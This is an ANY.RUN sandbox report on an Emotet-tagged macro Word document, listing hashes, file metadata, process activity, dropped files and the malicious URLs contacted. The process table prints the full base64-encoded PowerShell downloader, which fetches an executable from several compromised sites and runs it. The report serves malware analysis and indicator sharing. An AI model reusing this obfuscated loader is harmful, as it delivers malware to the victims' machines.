analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PLIK_05160232_65368990412.doc

Full analysis: https://app.any.run/tasks/39cede2f-64a2-49c3-8528-e6b6ed72546c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: June 19, 2019, 09:05:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: sky blue Practical Plastic Ball, Subject: Panama, Author: Martin Treutel, Comments: Saint Helena Pound Mountain, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 30 06:41:00 2019, Last Saved Time/Date: Tue Apr 30 06:41:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
MD5:

2E1492E29EDCC8BB86D385705CA82D71

SHA1:

1EE4908747B870A220E26C7F98F62940536C3600

SHA256:

4F71011C7945DE55302CB27C6FBB0532518A1C56FA7969EE99FBAEFF5BDF6FC6

SSDEEP:

3072:P77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qurxikSTKqOg1k+v+6:P77HUUUUUUUUUUUUUUUUUUUT52VPxiT/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3048)

    • PowerShell script executed

      • powershell.exe (PID: 3048)

    • Creates files in the user directory

      • powershell.exe (PID: 3048)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Kshlerin
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 104
Paragraphs: 1
Lines: 1
Company: Wisozk - Kling
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 90
Words: 15
Pages: 1
ModifyDate: 2019:05:31 05:41:00
CreateDate: 2019:05:31 05:41:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Saint Helena Pound Mountain
Keywords: -
Author: Martin Treutel
Subject: Panama
Title: sky blue Practical Plastic Ball
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PLIK_05160232_65368990412.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3048powershell -nop -e JABMAEMATQBOAEcAZgAwAHEAPQAnAFEAcwBjAEEANgBsAGMAJwA7ACQAcABNAGEAawBhADMAIAA9ACAAJwA3ADMAMAAnADsAJABKAEsATABuAGoAcwA9ACcARABXAGsAbwBDAHcASQBzACcAOwAkAEoAdQBHAFcAbgBpADUARAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcABNAGEAawBhADMAKwAnAC4AZQB4AGUAJwA7ACQAagBtAFkAOABWAFoAdQA5AD0AJwBQAHoASQByAHIAWgBsAEMAJwA7ACQAcQBiAEIAVwBwAGEAbgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBFAHQAYAAuAHcAYABFAEIAYABjAGAAbABpAGUAbgBUADsAJABoAHoAdABFAHIAUAA9ACcAaAB0AHQAcAA6AC8ALwB2AGUAbAB2AGUAdAByAG8AYwBrAGEAcABwAHMALgBjAG8AbQAvAFIAZQBzAG8AdQByAGMAZQBzAC8AcABhAGQAeABCAFgAUQBoAEEAdgAvAEAAaAB0AHQAcAA6AC8ALwB2AGsAcABvAC4AbgBlAHQALwBrAGUAbQBsAHkALgBuAGUAdAAvAHkAdABEAEUAZgBjAEIAeAAvAEAAaAB0AHQAcAA6AC8ALwB3AGEAbABkAGUAbgAtAGcAbQBiAGgALgBjAG8AbQAvADgAdwA2ADgAOAB2AHYAZAA1AG0AXwByAHgAaABpAG0AMwAtADEAMgAzADUANgAvAEAAaAB0AHQAcAA6AC8ALwB3AGUAZwBlAGwAZQByAC4AbgBlAHQALwAzAG4AegB5ADQAdQBmAF8AOABwAGEANQB6AC0AOAA0ADEANwAwAC8AQABoAHQAdABwADoALwAvAHcAaQBjAGsAeQBzAHAAbABhAGMAZQAuAGMAbwBtAC8AbQA0AHoAbwB1AG0AcQB4AGQAXwBqAGkAMwBsADkAMQBrAGgALQAzAC8AJwAuAFMAUABsAGkAdAAoACcAQAAnACkAOwAkAGgAWgBjAFEAbQAzADYAPQAnAGoANABNADAAaQBGAGoANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAdgBpADcAXwBmAHQAagBWACAAaQBuACAAJABoAHoAdABFAHIAUAApAHsAdAByAHkAewAkAHEAYgBCAFcAcABhAG4ALgBEAG8AdwBuAGwATwBBAEQARgBpAGwAZQAoACQAdgBpADcAXwBmAHQAagBWACwAIAAkAEoAdQBHAFcAbgBpADUARAApADsAJABvADUAbQA1AFAAYQBQAE4APQAnAGoASwBGADMARABUAE8ASgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAdQBHAFcAbgBpADUARAApAC4AbABlAG4AZwB0AEgAIAAtAGcAZQAgADIAMgA2ADYANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAUgB0ACgAJABKAHUARwBXAG4AaQA1AEQAKQA7ACQAYQBEAFMASAA3AEYAMQA9ACcARwBqAFcATwBGAHEAQwAnADsAYgByAGUAYQBrADsAJAByAFcAbwBBAHQAQwA9ACcAUgA2AEwAMwBhAHYANgBVACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAdwBVAFUAWgBrAFMAMQA9ACcAcwB6AFkAUQBzADgAUwA5ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 346
Read events
882
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
9

Dropped files

PID
Process
Filename
Type
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED6A.tmp.cvr
MD5:
SHA256:
3048powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GTBY3K4025AOAXCMI6OH.temp
MD5:
SHA256:
3048powershell.exeC:\Users\admin\730.exe
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC13263A.wmfwmf
MD5:DEC2C7B08391264D99CFB9918D847759
SHA256:13819DAC13DCEBC910997DFEEB7CFAA4EC151E806F93336A16201F61FB5238D9
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$IK_05160232_65368990412.docpgc
MD5:302AEEA5ED0F67994536D79AB1D6D8DD
SHA256:D6D5EFE782EEC840038A7BA9A93D57D472E2114BAB1A4348D40FA4FEF742C1A4
3320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:59B915F43B43901FA79C60151EA8042C
SHA256:836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BCDC7B7.wmfwmf
MD5:366EEC002277438643941C1F1B8B6DF3
SHA256:D8C700368C8517D5795A595E25B77292A1AC04B6296CF194779311ABCAAACE6C
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67E50E4C.wmfwmf
MD5:8EF10F8C7F075617CB1B6DAFA3544D32
SHA256:27586763A61028672DAA57A7BFEDFE63EE4986613E70EBB7A82AD2609459D1C0
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFC001DD.wmfwmf
MD5:DEBCBB01CB4C4383BC46130D8BD99B23
SHA256:BD19E22BFC817261EEFBA5C4F67E4BCDC7A94E22EBD8D847D8342D029DE45F16
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A41FD01.wmfwmf
MD5:3F6494A5A1B2A13FDE0F28FD7D32FF6D
SHA256:E9A909E0EF1468A104B48EDE9D053AC1BD16944D55977E29DA28A39BF774E6E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3048
powershell.exe
GET
403
209.87.151.179:80
http://wickysplace.com/m4zoumqxd_ji3l91kh-3/
US
html
411 b
unknown
3048
powershell.exe
GET
404
81.169.145.95:80
http://walden-gmbh.com/8w688vvd5m_rxhim3-12356/
DE
html
222 b
malicious
3048
powershell.exe
GET
200
81.169.145.159:80
http://wegeler.net/3nzy4uf_8pa5z-84170/
DE
html
4.56 Kb
malicious
3048
powershell.exe
GET
404
149.255.62.37:80
http://velvetrockapps.com/Resources/padxBXQhAv/
GB
html
964 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3048
powershell.exe
81.169.145.95:80
walden-gmbh.com
Strato AG
DE
malicious
3048
powershell.exe
209.87.151.179:80
wickysplace.com
Beyond Hosting, LLC
US
unknown
3048
powershell.exe
23.231.4.21:80
vkpo.net
Eonix Corporation
US
suspicious
3048
powershell.exe
149.255.62.37:80
velvetrockapps.com
Awareness Software Limited
GB
suspicious
3048
powershell.exe
81.169.145.159:80
wegeler.net
Strato AG
DE
malicious

DNS requests

Domain
IP
Reputation
velvetrockapps.com
  • 149.255.62.37
suspicious
vkpo.net
  • 23.231.4.21
suspicious
walden-gmbh.com
  • 81.169.145.95
malicious
wegeler.net
  • 81.169.145.159
malicious
wickysplace.com
  • 209.87.151.179
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
PLIK_05160232_65368990412.doc